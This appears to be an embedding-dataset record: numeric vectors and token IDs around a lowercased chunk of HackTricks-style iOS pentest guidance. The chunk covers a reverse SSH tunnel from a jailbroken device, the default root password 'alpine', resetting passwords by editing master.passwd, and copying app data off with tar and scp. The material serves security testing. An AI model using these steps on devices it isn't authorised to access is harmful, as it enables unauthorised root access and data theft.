-0.046300992369651794, 0.5268279314041138, 0.3446398377418518, -0.37019094824790955, 0.34465569257736206, 0.2003149688243866, 0.1489141881465912, 0.6425859928131104, -0.28094542026519775, -0.3248700797557831, 0.19385597109794617, -0.8192859888076782, 1.1113353967666626, -0.3922317326068878, -0.08969645202159882, -0.12694886326789856, 0.35421502590179443, 0.12982618808746338, 0.3068324029445648, -0.7196220755577087, -0.21850834786891937, -0.20117713510990143, 0.11076461523771286, 0.024217726662755013, -0.22198586165905, 0.7424421310424805, -0.6066877245903015, -0.5076478123664856, 0.1826273649930954, 0.14041519165039062, -0.33079713582992554, 0.3560129404067993, -0.22662903368473053, -0.6501747965812683, 0.4592209458351135, -0.3239179849624634, 0.6746161580085754, 0.05851105973124504, -0.6712819933891296, 0.0028403529431670904, -0.3949548602104187, 0.5427404046058655, 0.2959456443786621, 0.7849351763725281, -0.8698188662528992, -0.3787537217140198, 0.6806349158287048, -0.3982952833175659, 0.1835688054561615, 0.7533579468727112, -0.22086688876152039, 0.1415690779685974, -0.4299421012401581, 0.12485823780298233, -0.49510273337364197, -0.07434048503637314, -1.0652050971984863, -0.4586477279663086, -0.1466003656387329, -0.02183978073298931, 0.8074331283569336, 0.4153732359409332, -0.3836054503917694, 0.4814731180667877, -0.266495019197464, -0.6243805885314941, -0.8816800117492676, -0.09210002422332764, -0.44145768880844116, 0.011045105755329132, -0.5310106873512268, 0.1724817007780075, -0.27097177505493164, -0.1872764676809311, -0.0777563601732254, 0.18431156873703003, 0.04101499542593956, 0.1519618034362793, -0.3669702112674713, 0.6327296495437622, 0.01607242040336132, -0.19932425022125244, 0.1415477842092514, 0.17591308057308197, -0.34741002321243286, -0.19302481412887573, -0.5740785598754883, -0.4073988199234009, -0.08485221117734909, -0.7479930520057678, 0.7433526515960693, -0.5846089124679565, -0.021366305649280548, -1.2121928930282593, -1.5538371801376343, -0.8155092000961304, 0.6214226484298706, 0.41204124689102173, -1.1365333795547485, 0.6530595421791077, -0.3574022054672241, -0.07241170108318329, 0.015775267034769058, -0.7093371152877808, -0.8286026120185852, -0.5448017716407776, -0.6557462215423584, 0.7170279026031494, -0.7498882412910461, 0.28827303647994995, 0.3455124497413635, 0.1522078812122345, -0.2546432316303253, 0.13870598375797272, -0.6930161714553833, -0.352492094039917, -0.04874476045370102, 0.5718042850494385, -0.577118992805481, 0.5966790318489075, -0.45931798219680786, 0.18969464302062988, 0.12116079777479172, -0.10961727052927017, 0.03232415020465851, -0.25172990560531616, -0.1205478385090828, 1.4224309921264648, 1.3129172325134277, -0.6974108815193176, 0.1420939862728119, 0.2131495177745819, 0.8184093832969666, 0.4754672646522522, -0.5187209844589233, -1.1545112133026123, 0.3538963496685028, -0.41804227232933044, -0.7785133123397827, 0.09932148456573486, -0.045877035707235336, 0.28785112500190735, -0.3605322241783142, 0.19751381874084473, 0.014452816918492317, -0.47530633211135864, -0.4786638021469116, 1.2560632228851318, 0.1937805563211441, 0.6105720400810242, -1.0765774250030518, 0.9858411550521851, 0.9457136988639832, -0.785261869430542, 0.20083320140838623, -0.42383912205696106, 0.44136860966682434, 0.465749591588974, -0.7738353610038757, -0.1227748841047287, -0.6128122806549072, -0.339393675327301, 0.568871259689331, 0.4696398973464966, 0.12254314869642258, 0.31819969415664673, -0.2141636312007904, 0.6269604563713074, 0.16776718199253082, 0.2520483732223511, 0.3979179859161377, 0.7307665348052979, 0.5612603425979614, 0.17798984050750732, -0.18130500614643097, 0.023036273196339607, 0.10305517911911011, -0.09838711470365524, 0.6876181364059448, 0.679863452911377, -0.21493718028068542, 1.4405667781829834, 0.3931145966053009, -1.1116362810134888, -0.8510688543319702, -0.15857526659965515, -0.6565713286399841, 0.5004631876945496, -0.3138407766819, -0.04130120947957039, -0.17023523151874542, 0.17389324307441711, -0.6267852783203125, 0.14513717591762543, -0.14687798917293549, 0.5747511386871338, -0.7508605122566223, 0.181070014834404, -0.2979637384414673, 0.08761969208717346, 0.6139828562736511, -1.136877179145813, -0.9456912279129028, -1.0451784133911133, 0.11984322965145111, -0.19352489709854126, 0.6679611206054688, 0.8623769283294678, -0.3077365458011627, 0.40005114674568176, 0.24304771423339844, 0.07096290588378906, 0.45046859979629517, 0.3356660306453705, 0.829498827457428, 0.8632082939147949, -0.48654547333717346, -0.7418149709701538, 0.03355695307254791, 0.5922446846961975, -0.14546765387058258, 0.7044505476951599, -0.5132033824920654, 0.10774845629930496, 0.27647140622138977, 1.1601955890655518, -0.6970493793487549, -0.7822023630142212, -0.6825391054153442, -0.6908273696899414, -0.21711894869804382, -0.26089000701904297, -0.2745777368545532, -0.05586332455277443, 0.1509983092546463, -0.18504172563552856, 0.0936649963259697, -0.32120534777641296, 0.556993842124939, -0.9548978805541992, -0.031090766191482544, -0.7937608957290649, 0.28923580050468445, -0.5252089500427246, -0.6168261766433716, -0.5101921558380127, -0.2725162208080292, -0.5919038653373718, -0.2138843536376953, 0.006388741545379162, 0.1662261188030243, -0.22146102786064148, 0.19613869488239288, -0.08707831799983978, -0.2731262445449829, -0.04814448952674866, -0.7168147563934326, 0.11343924701213837, 0.5724729895591736, -0.2486015111207962, -0.22671552002429962, 0.047726165503263474, 0.023826854303479195, 0.8223415613174438, -0.30383825302124023, 0.46086835861206055, -0.24275310337543488, 0.2288295179605484, -0.2028527706861496, -0.029954131692647934, 0.2156326025724411, 0.15368865430355072, -0.13195054233074188, -0.17982524633407593, 0.6238004565238953, -0.3131747841835022, -0.5978401899337769, -0.14156721532344818, -0.17230282723903656, 0.22994102537631989, 0.04266555979847908, 0.39092695713043213, 0.11737286299467087, -0.14373943209648132, 0.19516146183013916, -0.20836782455444336, -0.2652908265590668, 0.3210964500904083, 0.1250380128622055, -0.09439964592456818, -0.9376690983772278, 0.04261760786175728, 0.40223798155784607, -0.6482025384902954, 0.003198756603524089, -0.932540774345398, -0.3137989938259125, -0.17028464376926422, 0.1817442923784256, 0.5918900370597839, 0.3644886016845703, 0.2332809418439865, 0.31428876519203186, 0.3577890992164612, 0.3298965096473694, -1.0571174621582031, -0.10341819375753403, -1.2123675346374512, -0.03557024523615837, -0.141245037317276, -0.3946794271469116, -1.1061397790908813, -0.25629499554634094, 0.304246723651886, 0.538215696811676, 0.03725770115852356, 0.11583299189805984, -0.36590784788131714, -0.6188908219337463, 0.6244068741798401, 0.6360072493553162, -0.7121599912643433, -0.539058268070221, -0.5454572439193726, 0.5929646492004395, -0.2021356225013733, -0.8160887956619263, 0.7025819420814514, 0.8142650723457336, 0.17556944489479065, -0.8082272410392761, -0.4516158699989319, -0.4568759500980377, 0.7515330910682678, -0.017434777691960335, 0.576347827911377, -0.06412302702665329, -1.1539360284805298, 1.0721395015716553, -0.562465250492096, 0.21256189048290253, -0.520226240158081, -0.027273984625935555, -0.1708916425704956, -0.25152507424354553, -0.0020254075061529875, 0.8541596531867981, -0.0608796551823616, -0.14553488790988922, 0.16432695090770721, 0.6099076867103577, 0.5809314846992493, -0.5031025409698486, 0.20649036765098572, -0.374626100063324, 0.3655417561531067, 0.3886571526527405, -0.16849984228610992, -0.03443203493952751, 0.6674988865852356, 0.5374024510383606, -0.6449874043464661, -0.018494118005037308, 0.3175452947616577, -0.3279880881309509, -0.4699535369873047, 0.4540596306324005, -0.6036134958267212, -0.19527123868465424, -0.24913424253463745, -0.13694177567958832, -0.0466163270175457, 0.00044953374890610576, 0.3914521634578705, -0.06699863821268082, 0.030665574595332146, 1.0517812967300415, -0.5417346954345703, 1.199075698852539, 0.7967526912689209, -0.22188130021095276, 0.42001697421073914, -0.2886047661304474, -0.31155267357826233, 0.04047355055809021, 1.2795333862304688, 0.3401278257369995, 0.28113654255867004, 0.6910420060157776, 0.2956464886665344, -0.4982931315898895, 0.4848654568195343, 0.2041449248790741, -1.1492805480957031, 0.24027973413467407, 0.1156715676188469, -0.06402676552534103, -0.5580291748046875, 0.1378328502178192, 0.029648475348949432, -0.6153830885887146, 0.36994218826293945, -0.3261638879776001, 0.3171379864215851, -0.4227693974971771, 0.629660964012146, 0.17149046063423157, 0.3258453905582428, 0.43855807185173035, -0.38398823142051697, -0.9806604385375977, 1.006664514541626, -0.6063829064369202, 0.7387675046920776, 0.27029234170913696, 0.21673405170440674, 0.04093199223279953, 0.016461068764328957, 0.3850342631340027, -0.40246641635894775, -0.0033857019152492285, -0.36664655804634094, -0.3715320825576782, -0.18966269493103027, 0.010092332027852535, -0.233074352145195, 0.5160796642303467, -0.012631387449800968, -0.29471877217292786, -0.258235901594162, 0.039517905563116074, -0.1128210723400116, -0.3652835488319397, -0.6327267289161682, -0.612667977809906, 0.050090935081243515, -0.04163697734475136, -0.02702328749001026, 0.1925596296787262, 0.2057480812072754, -0.9322417378425598, -0.3323994576931, -0.23747305572032928, -0.20317845046520233, -0.21473385393619537, 0.8941444158554077, -0.509703516960144, 0.002891769865527749, 0.3052279055118561, -0.8287380933761597, -0.7581154108047485, 0.329955518245697, -0.8867115378379822, -0.38326016068458557, 0.2992776334285736, -0.39241212606430054, 1.0924897193908691, 0.8421518802642822, 0.07860708981752396, 0.48434457182884216, 0.0023030058946460485, 0.6208657622337341, -0.4204728603363037, 0.8715556859970093, 0.3550989627838135, -0.6232202649116516, 0.027473783120512962, -0.05339597538113594, 0.639334499835968, -1.5208462476730347, 0.0035772111732512712, 0.08265644311904907, 0.01881897635757923, -0.7100971341133118, -0.6230856776237488, -0.13028670847415924, -0.5083257555961609, -0.38454630970954895, 0.4598003923892975, -0.6188805103302002, -0.4912806451320648, -1.1920009851455688, 0.5151570439338684, -0.58551424741745, -0.27183786034584045, 0.5573670864105225, -0.0166755560785532, 0.052403319627046585, -1.427125096321106, 4.13016414642334, 0.8199983835220337, 0.015701396390795708, 0.28744280338287354, 0.0993226170539856, 0.3634974956512451, 0.7888028621673584, -0.4282674789428711, -0.017541376873850822, -0.716858983039856, -0.03458193317055702, -0.4075489640235901, 0.6033984422683716, 0.3563312590122223, 0.287826269865036, 0.6060356497764587, -0.019890179857611656, 0.35273289680480957, 0.606229305267334, -0.6293962597846985, -1.0385775566101074, -0.4011477828025818, -0.22669774293899536, 0.8611818552017212, -0.1571016162633896, 0.8347147703170776, 0.3017359673976898, -0.6361258029937744, -0.5171481370925903, -0.19854363799095154, 0.6764343976974487, -0.28281816840171814, 0.4785027801990509, -0.542008101940155, -0.8276561498641968, 0.39760568737983704, -0.017776617780327797, -0.08716894686222076, -0.3187958002090454, -0.07123538106679916, 0.27159419655799866, 0.11038492619991302, 0.3417895436286926, -0.12393706291913986, -0.1946648508310318, 0.776308536529541, -0.5234972834587097, 0.40034881234169006, 0.8346976637840271, -0.2550220489501953, 0.7968469858169556, -0.46463289856910706, -0.2301992028951645, -0.16888420283794403, -0.8750728368759155, -0.455527663230896, 0.32340165972709656, -0.5690571069717407, -0.014412197284400463, 0.27936607599258423, 0.25300729274749756, -0.5883479118347168, 0.297590434551239, -0.6307310461997986, -0.3293871283531189, 0.5701526999473572, 0.21868738532066345, 1.2584171295166016, -0.09887658804655075, -0.11995163559913635, -0.6892645955085754, -0.4977684020996094, -0.7170624732971191, -0.4926954507827759, 0.7572289705276489, -0.3924969732761383, 0.11553734540939331, 0.9309655427932739, 0.6224725246429443, -0.3706074357032776, -0.1648855060338974, 0.22339661419391632, -0.6097831726074219, -0.044557396322488785, 0.30624207854270935, 0.508823037147522, 0.2013832926750183, -1.067226529121399, -0.29828664660453796, 0.29999643564224243, 0.8226791024208069, 0.12446605414152145, -0.6327236294746399, 0.15427479147911072, 0.08702352643013 ]
[ 2031, 5361, 2070, 2047, 10439, 3208, 2066, 22330, 9032, 1012, 7020, 10606, 2344, 2000, 9585, 7020, 2232, 3229, 2000, 2115, 16380, 5080, 2017, 2064, 16500, 1996, 7480, 4095, 7427, 1012, 2320, 5361, 1010, 2017, 2064, 3229, 2115, 5080, 3081, 7020, 2232, 2770, 7020, 2232, 7117, 1030, 1026, 5080, 1035, 12997, 1035, 4769, 1028, 1010, 2029, 2097, 8833, 2017, 1999, 2004, 1996, 7117, 5310, 1024, 1002, 7020, 2232, 1031, 10373, 5123, 1033, 1031, 10373, 5123, 1033, 1005, 1055, 20786, 1024, 18059, 1024, 1066, 7117, 1001, 2043, 3229, 2075, 2115, 16380, 5080, 3081, 7020, 2232, 5136, 1996, 2206, 1024, 1996, 12398, 5198, 2024, 7117, 1998, 4684, 1012, 1996, 12398, 20786, 2005, 2119, 2003, 10348, 1012, 3342, 2000, 2689, 1996, 12398, 20786, 2005, 2119, 5198, 7117, 1998, 4684, 2004, 3087, 2006, 1996, 2168, 2897, 2064, 2424, 1996, 12997, 4769, 1997, 2115, 5080, 1998, 7532, 3081, 1996, 2092, 1011, 2124, 12398, 20786, 1010, 2029, 2097, 2507, 2068, 7117, 3229, 2000, 2115, 5080, 1012, 7532, 2000, 1037, 5080, 3081, 7020, 2232, 2058, 18833, 24979, 2075, 1037, 2613, 2304, 3482, 3231, 1010, 1037, 10539, 15536, 1011, 10882, 4434, 2089, 2025, 2022, 2800, 1012, 1999, 2023, 3663, 1010, 2017, 2064, 2224, 18833, 12274, 2595, 2094, 2000, 7532, 2000, 2115, 5080, 1005, 1055, 7020, 2232, 8241, 3081, 18833, 1012, 7532, 6097, 2891, 2000, 2019, 16380, 5080, 2011, 23658, 1998, 3225, 12997, 3217, 18037, 1024, 1002, 24702, 16500, 5622, 5638, 17751, 24844, 6610, 1002, 12997, 3217, 18037, 19015, 2475, 2570, 21547, 3436, 2005, 4434, 10760, 2682, 3094, 7341, 3417, 2570, 2006, 1996, 16380, 5080, 2000, 3417, 19015, 2475, 2006, 2334, 15006, 2102, 1012, 2017, 2064, 2036, 2191, 12997, 3217, 18037, 2448, 8073, 1999, 1996, 4281, 2065, 2017, 2123, 1005, 1056, 2215, 2000, 2448, 1996, 12441, 2296, 2051, 2017, 2215, 2000, 7020, 2232, 2058, 18833, 1012, 2007, 1996, 2206, 3094, 1999, 1037, 2047, 5536, 3332, 1010, 2017, 2064, 7532, 2000, 1996, 5080, 1024, 1002, 7020, 2232, 1011, 1052, 19015, 2475, 7117, 1030, 2334, 15006, 13181, 4140, 1030, 2334, 15006, 2102, 1005, 1055, 20786, 1024, 18059, 1024, 1066, 7117, 1001, 2235, 3602, 2006, 18833, 1997, 2019, 8909, 17726, 2063, 1024, 2006, 2019, 16380, 5080, 2017, 3685, 2191, 2951, 7264, 4902, 2044, 1015, 3178, 1997, 2108, 1999, 1037, 5299, 2110, 1010, 4983, 2017, 19829, 2009, 2153, 2349, 2000, 1996, 18833, 7775, 5549, 1010, 2029, 2001, 3107, 2007, 16380, 2340, 1012, 1018, 1012, 1015, 2239, 1011, 5080, 5806, 10439, 19927, 2788, 2478, 2019, 2006, 1011, 5080, 5806, 1006, 5536, 7861, 20350, 1007, 2453, 2022, 2200, 6945, 6313, 4102, 2000, 1037, 6556, 5806, 1010, 2009, 2064, 6011, 18801, 2005, 2139, 8569, 12588, 1999, 2553, 1997, 1010, 2005, 2742, 1010, 2897, 3314, 2030, 4638, 2070, 9563, 1012, 2005, 2742, 1010, 2017, 2064, 16500, 25597, 2121, 2213, 1016, 3081, 22330, 9032, 2005, 2023, 3800, 1006, 2009, 6753, 16380, 1020, 1012, 1014, 2000, 2260, 1012, 1015, 1012, 1016, 2012, 1996, 2051, 1997, 2023, 3015, 1007, 1012, 1999, 2804, 1010, 2045, 2024, 1037, 2261, 7173, 23890, 2015, 2008, 12045, 4487, 19150, 14932, 7020, 2232, 2005, 3036, 4436, 1012, 1999, 2216, 3572, 1010, 2009, 2003, 2200, 14057, 2000, 2031, 2019, 2006 ]
hack_tricks
436.txt
1
- device shell app, which you can use to first ssh out of the device with a reverse shell, and then connect from your host computer to it. opening a reverse shell over ssh can be done by running the command ssh - r < remote _ port > : localhost : 22 < username > @ < host _ computer _ ip >. on the on - device shell app run the following command and, when asked, enter the password of the mstg user of the host computer : ssh - r 2222 : localhost : 22 [ email protected ] on your host computer run the following command and, when asked, enter the password of the root user of the ios device : $ ssh - p 2222 root @ localhostforgotten passwordif you forget your password and want to reset it to the default alpine : 1. edit the file / private / etc / master. passwd on your jailbroken ios device using an on - device terminal or using apps like filza or ifile2. find the lines : root : xxxxxxxxx : 0 : 0 : : 0 : 0 : system administrator : / var / root : / bin / sh mobile : xxxxxxxxx : 501 : 501 : : 0 : 0 : mobile user : / var / mobile : / bin / sh3. change xxxxxxxxx to / smx7mytqii2m ( which is the hashed password alpine ) 4. save and exitdata transfercopying app data files via ssh and scpas we know now, files from our app are stored in the data directory. you can now simply archive the data directory with tar and pull it from the device with scp : iphone : ~ root # tar czvf / tmp / data. tgz / private / var / mobile / containers / data / application / 8c8e7eb0 - bc9b - 435b - 8ef8 - 8f5560eb0693iphone : ~ root # exit $ scp - p 2222 root @ localhost : / tmp / data. tgz. using ifunboxifunbox is a gui application that can be used for several things ( uploading / downloading files among them ). another gui tool for this purpose is iexplorer. starting in ios version 8. 4, apple has restricted the third - party managers to access to the application
[ 0.17642925679683685, -0.17840585112571716, 0.11870092898607254, 0.2587096691131592, -0.3021257817745209, -0.2215665727853775, -0.6295968890190125, 0.41908735036849976, 0.033461377024650574, 0.805526077747345, 0.46317601203918457, 0.1974475383758545, 0.2336777001619339, -0.7641575932502747, -0.522847592830658, -0.5094450116157532, -0.11594147235155106, -0.0012750881724059582, -0.5841557383537292, -0.22468960285186768, 0.4238519072532654, 0.0394708551466465, -0.5601888298988342, -0.33911609649658203, -0.11002804338932037, 0.256510853767395, 0.6056519150733948, 0.1820906698703766, 0.46038568019866943, 0.31994831562042236, 0.01998971588909626, -0.10505296289920807, 0.10309220105409622, -0.4550289511680603, 0.41948628425598145, -0.4768233299255371, 1.1070655584335327, -0.4301284849643707, 0.1468704491853714, -0.4386601150035858, 0.33552077412605286, -0.011954664252698421, 0.007147281896322966, -0.7062059044837952, -0.8015283346176147, -0.4129135012626648, 0.10831471532583237, 0.10488653182983398, -0.20614948868751526, -0.0017094681970775127, 0.2801370620727539, 0.20661579072475433, 0.06973599642515182, 0.033800091594457626, 0.8414742946624756, -0.566199779510498, -0.32399359345436096, -0.3618195056915283, -0.34506428241729736, 0.47257500886917114, -0.13368089497089386, 0.27988049387931824, 0.09476184844970703, -0.40442079305648804, 0.20598092675209045, 0.8049191236495972, -0.363170325756073, -0.5097947716712952, -0.294185072183609, -0.6707457304000854, -0.47718334197998047, 0.4928208291530609, -0.5566315054893494, -0.7479985356330872, -0.5356142520904541, -0.13944315910339355, 0.5784860849380493, -0.24608850479125977, 0.11920570582151413, 0.9287766814231873, -0.012108081951737404, 0.5630658864974976, 0.29847997426986694, -0.0893421545624733, -0.12303476780653, -0.2675740122795105, 0.6801913380622864, 0.4475556015968323, -0.34786272048950195, -0.16818302869796753, 0.07325469702482224, 0.459804505109787, -0.7120683193206787, -0.17665962874889374, 0.19282174110412598, 0.5082331895828247, -0.6547424793243408, -0.28762462735176086, -0.022407304495573044, -0.489489883184433, 0.5473790764808655, 0.6773573160171509, 0.5824512839317322, 0.2790999412536621, 0.09633462876081467, 0.2964109778404236, 0.6833850145339966, -0.09408047795295715, 0.16115312278270721, -0.6809345483779907, 0.6150501370429993, -0.29844003915786743, 0.18905219435691833, -1.1874988079071045, -0.2958398759365082, 0.022622790187597275, 0.7392787337303162, 0.08200278133153915, -0.34970545768737793, 0.4495105743408203, -0.1514982432126999, -0.25862398743629456, 0.5865762233734131, -0.3599790036678314, -0.38470783829689026, 0.3261353075504303, 0.3222862482070923, 0.3226557672023773, -0.9252368807792664, -0.41892141103744507, -0.3911089599132538, -0.5609458684921265, -0.32977163791656494, 0.9004886150360107, -1.1332002878189087, 0.5620431900024414, 0.16256482899188995, -0.09576161205768585, 0.6269187331199646, -1.0180944204330444, 0.020957155153155327, 0.2213127464056015, 0.5352247953414917, 1.0323398113250732, 0.33515647053718567, 0.23211011290550232, -0.24335919320583344, -0.3963989317417145, 0.23074987530708313, 1.022531509399414, -0.16405481100082397, 0.24911262094974518, 0.7098075747489929, -0.5890313982963562, -0.4628554880619049, 0.6989941596984863, -0.5253753662109375, 0.7949827313423157, -0.7861995697021484, 0.39113134145736694, -0.3951433598995209, 0.753332257270813, -0.15704970061779022, 0.4362173080444336, 0.5201569199562073, 0.7536367774009705, -0.4580477774143219, -0.028298450633883476, -0.6588078737258911, 0.17028385400772095, 0.17391462624073029, -0.05461779236793518, 0.20000328123569489, 0.3704547882080078, 1.386084794998169, 0.48756909370422363, -0.07939798384904861, 0.16915443539619446, -0.039200425148010254, 0.38014617562294006, -0.6281308531761169, 0.5748123526573181, 0.5486249327659607, 0.6952022314071655, -0.20457421243190765, 0.144800066947937, 0.08473479002714157, 0.05096226558089256, -0.06897883862257004, -0.4338605999946594, -0.5286813974380493, 0.7524880170822144, -0.5182134509086609, 0.6082019209861755, 0.4439235031604767, 0.08189798146486282, -1.4076969623565674, 0.07713062316179276, 0.06474116444587708, -0.6003024578094482, -0.7018071413040161, 0.16966545581817627, 0.35774463415145874, 0.6292347311973572, -0.6610121130943298, -0.4810132086277008, 1.1914581060409546, 0.5287030935287476, 0.15534842014312744, 0.26799240708351135, 0.6431227326393127, 0.12518388032913208, -0.6551303863525391, 0.07206062972545624, 0.30738571286201477, -0.24424540996551514, -0.5552405714988708, 0.1578962653875351, -0.15578101575374603, 0.41619691252708435, -0.30881938338279724, 0.8528561592102051, 0.24610401690006256, 0.42612800002098083, -0.4361910820007324, 0.5730991363525391, -0.09875292330980301, 0.4129279851913452, -0.34166836738586426, -0.26902371644973755, -0.012603463605046272, 0.9357877969741821, 0.0964134931564331, 0.9251061081886292, 0.047398366034030914, -0.9881216883659363, 0.6151268482208252, 0.1632290631532669, -0.016409853473305702, -0.0942016988992691, 0.03730230778455734, 0.762698233127594, 0.4095518887042999, 0.1920030564069748, 0.6525269746780396, 0.011712105944752693, 0.12126504629850388, -0.20208372175693512, 0.4868793785572052, 0.7596070766448975, -0.0666365846991539, 0.20448888838291168, 0.41598692536354065, -0.6651118397712708, -0.8333197832107544, -0.22803393006324768, 0.6401498913764954, 0.3189580738544464, -0.5649741291999817, -0.7946376204490662, 0.020049385726451874, -0.6355050206184387, 0.2040407806634903, 0.2834398150444031, -0.038925494998693466, 0.45492255687713623, -0.13911330699920654, -0.04120504483580589, 0.015331349335610867, -0.3305775821208954, -0.6921132206916809, -0.04465445876121521, -0.6579548120498657, -0.5462673306465149, -1.1995108127593994, 0.294820636510849, 0.15875865519046783, -0.3649820387363434, 0.6863804459571838, -0.5267723202705383, -0.42242732644081116, 0.030297987163066864, 0.46272289752960205, 0.3671228587627411, -0.09628424048423767, 0.1241898164153099, -0.7499527931213379, -0.10475458949804306, -0.27293840050697327, 0.32953211665153503, -0.30804285407066345, -0.22168488800525665, 0.0828867182135582, -0.5514634847640991, -0.4673514664173126, -0.3201640248298645, 0.5554807186126709, -0.20675744116306305, -0.02053922601044178, -0.17525149881839752, -0.18050530552864075, -0.24420589208602905, 0.5988745093345642, -0.1586831957101822, -0.17042875289916992, 0.34359416365623474, -0.20288072526454926, 0.3491254448890686, 0.6249882578849792, 0.25157690048217773, -0.6571121215820312, 0.05088206008076668, -0.40767112374305725, 0.7354143261909485, -0.32727524638175964, 0.9897251725196838, 0.26251736283302307, 0.16639693081378937, -0.13539421558380127, -0.5000319480895996, 0.17669720947742462, -0.7078812718391418, -0.42980438470840454, -0.22722214460372925, -0.18308061361312866, 0.36943817138671875, -0.24535228312015533, -0.9692168235778809, 0.07872746884822845, -0.2097838670015335, -0.4223345220088959, 0.19883224368095398, -0.3560616970062256, 1.1356302499771118, -0.09300009906291962, 0.018507977947592735, -0.3546662926673889, -0.36809712648391724, 0.15781140327453613, 0.8235821723937988, 0.21933676302433014, -0.5178767442703247, 0.012378350831568241, -0.04596766456961632, -0.3731209933757782, 0.3814208209514618, 0.32151997089385986, -0.30374875664711, -0.47841259837150574, -0.03223564475774765, 0.2635289132595062, -0.44089433550834656, 0.3759167194366455, 0.7009268999099731, 0.6508260369300842, 0.1149025484919548, -0.8176282644271851, -0.23800203204154968, -0.13505643606185913, 0.2991507351398468, 0.20107878744602203, -0.010888494551181793, 0.014895916916429996, 0.8111562132835388, -0.6202538013458252, -0.1868647336959839, 0.02956264466047287, 0.04230136424303055, 0.47749796509742737, 0.1332009881734848, -0.07681959122419357, 0.030701929703354836, 0.355935275554657, 0.5799362659454346, -0.5128034949302673, -0.5593295693397522, 0.19008754193782806, 0.12482336163520813, 0.7798380255699158, -0.3730149567127228, 0.2036525011062622, -0.144242525100708, -0.33351629972457886, 0.35275697708129883, 0.12677349150180817, -0.2175268530845642, -0.5469537377357483, -0.3268718123435974, -0.25294139981269836, -0.020323369652032852, 0.207204207777977, -0.14054688811302185, 0.31358757615089417, -0.10672455281019211, -0.6492995619773865, -1.0526906251907349, 0.8751494288444519, 0.6423198580741882, 0.7143776416778564, 0.48708727955818176, 0.3840920329093933, 0.602113664150238, -0.3091849982738495, 0.40357181429862976, -0.6860262751579285, 0.1591382473707199, 0.3617456257343292, 0.8788485527038574, -0.547382116317749, 0.06855525076389313, 0.38571906089782715, -0.17183174192905426, 0.1251448690891266, 0.32213184237480164, -0.28771141171455383, 0.19048191606998444, -0.2316845953464508, -0.25075823068618774, 0.08344805985689163, -0.3414323925971985, -0.539357602596283, -0.6055111289024353, -0.5214120745658875, 0.4282529354095459, 0.6168922185897827, -0.28531086444854736, -0.18291333317756653, -0.7628339529037476, -0.014541774988174438, 0.0861610397696495, 0.11115676164627075, -0.36156710982322693, -0.5148027539253235, -0.4685279428958893, -0.7518672347068787, 0.16700786352157593, 0.3095094859600067, 0.579400360584259, -0.01705932803452015, -0.6505799293518066, -0.4102742373943329, 0.4444253444671631, -0.24692967534065247, -0.5188831686973572, -0.28940245509147644, 0.3329594135284424, 0.581200122833252, 0.6965045928955078, -0.03909477964043617, -0.11617697030305862, 0.00026857072953134775, -0.35321104526519775, 0.5966724157333374, -0.8114525675773621, 0.09759946167469025, 0.7606277465820312, -0.13889475166797638, 0.0559922531247139, 0.06028548255562782, -0.6286053657531738, -0.2381574809551239, -0.5601868629455566, 0.14940202236175537, -0.7354633212089539, -0.45646247267723083, 0.32161036133766174, -0.46872448921203613, -0.11680915206670761, 0.2511698603630066, 0.17252326011657715, 0.3284350037574768, -0.0011758747277781367, -0.2787765562534332, -0.36725613474845886, 0.31748998165130615, -0.5353828072547913, 1.0820056200027466, -0.021084589883685112, -0.21131941676139832, -0.05128961428999901, -0.12670637667179108, 0.7570506930351257, 0.16681291162967682, 0.3405188024044037, -0.9959734678268433, -0.32506874203681946, 0.37384670972824097, 0.18597671389579773, 0.18963073194026947, 0.36801356077194214, -0.1295197457075119, -0.08414071053266525, -0.19159601628780365, 0.35512468218803406, -0.561629056930542, -0.5612198710441589, -0.6096575856208801, -0.44455793499946594, 0.42435234785079956, -0.15974481403827667, 0.32700517773628235, 0.07435358315706253, -0.4895440936088562, 0.38195356726646423, -0.5012699961662292, 0.011489126831293106, -0.4355050325393677, -0.12480304390192032, -0.72315913438797, 0.33107951283454895, -0.571102499961853, 0.05329703912138939, -0.26622194051742554, 0.256889283657074, -0.12031978368759155, 0.46578389406204224, 0.41542336344718933, -0.27730241417884827, 0.004328473005443811, 0.9034155607223511, 0.27685603499412537, -0.42116209864616394, 0.46373116970062256, 0.17028215527534485, -0.2116984874010086, -0.417462557554245, -0.11247483640909195, -0.29690247774124146, -0.5692858695983887, -0.9771736860275269, 0.310316264629364, -0.4955494701862335, 0.069021075963974, -0.29675695300102234, -1.0752756595611572, -0.12819628417491913, 0.14831668138504028, 0.33551350235939026, -0.980339765548706, 0.5017105340957642, -0.02866523712873459, -0.3024253249168396, 0.22893309593200684, -0.4795926511287689, -0.5449684858322144, -0.6153358817100525, -0.8555467128753662, 0.6461168527603149, -0.4436175525188446, 0.11062635481357574, 0.22594310343265533, -0.22165946662425995, 0.22433960437774658, 0.4897814095020294, -0.2879211902618408, -0.5306651592254639, -0.2189706414937973, 0.2132996767759323, -0.25286152958869934, 0.19623781740665436, -0.5373337864875793, 0.18885256350040436, -0.09769099205732346, -0.29157519340515137, -0.12896984815597534, -0.3989673852920532, -0.542401909828186, 0.2961771786212921, 0.8037588000297546, -0.4584352672100067, 0.3600783348083496, 0.1111583337187767, 0.7465415596961975, 0.5382634997367859, 0.06316258758306503, -0.7005127668380737, 0.3337112069129944, -0.48007190227508545, -1.0626096725463867, 0.4124740660190582, -0.08491550385951996, -0.0009097229922190309, -0.0736154168844223, 0.475720077753067, 0.5176573395729065, -1.136223316192627, 0.052125684916973114, 0.8179461359977722, 0.10836038738489151, 0.6040881872177124, -1.3014122247695923, 0.711374819278717, 0.3893664479255676, -0.31031981110572815, -0.2594367563724518, -0.39911869168281555, 0.4535807967185974, -0.31911778450012207, -0.1608339250087738, -0.3389502763748169, -0.6575072407722473, -0.5296240448951721, 0.498383492231369, 0.41366270184516907, 0.3583982288837433, 0.17268401384353638, -0.13967904448509216, 0.010676445439457893, 0.09256288409233093, -0.2081044316291809, 0.25099989771842957, 0.3330264985561371, 0.430183082818985, -0.004672089591622353, -0.41579702496528625, 0.07157527655363083, -0.2699069678783417, -0.348395437002182, 0.2625088393688202, 0.19450733065605164, -0.42064887285232544, 0.9187029004096985, -0.1104888990521431, -0.916396975517273, -0.4485851228237152, -0.553571343421936, -0.1400434374809265, 0.10501798242330551, -0.06986123323440552, -0.14584647119045258, -0.29646170139312744, 0.37603697180747986, -0.04372671991586685, 0.44593971967697144, 0.10824179649353027, 0.3550800383090973, -0.35703250765800476, 0.5243090987205505, 0.4929611086845398, 0.07286777347326279, 0.4042792320251465, -0.6648250222206116, -0.6803063750267029, -1.2534111738204956, -0.252216100692749, -0.17114926874637604, 0.35180971026420593, 0.3017827868461609, 